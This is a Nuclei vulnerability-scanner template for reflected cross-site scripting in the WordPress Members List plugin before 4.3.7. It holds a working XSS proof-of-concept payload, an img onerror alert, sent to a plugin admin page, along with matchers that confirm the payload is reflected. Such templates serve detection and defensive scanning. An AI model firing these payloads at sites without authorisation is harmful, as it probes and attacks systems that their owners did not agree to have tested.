id: members-list-xss

info:
  name: WordPress Members List <4.3.7 - Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: WordPress Members List 4.3.7 does not sanitize and escape some parameters in various pages before outputting them back, leading to reflected cross-site scripting vulnerabilities.
  reference:
    - https://wpscan.com/vulnerability/d13f26f0-5d91-49d7-b514-1577d4247648
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    max-request: 1
  tags: wp,wordpress,wp-plugin,xss,wpscan

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/members-list/admin/view/user.php?page=%22%3E%3Cimg%20src%20onerror=alert(document.domain)%20x'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><img src onerror=alert(document.domain) x'
          - "wrap tern-wrap"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# digest: 490a00463044022045c907de37f9bc7fddd0577ecb9a794d96c7644892bcbea009f293e9bbcb6c4b022005498e2fdb6ebe22ea8e247148c531aaf381a37afdc98425f144b42b912f5062:922c64590222798bb761d5b6d8e72950
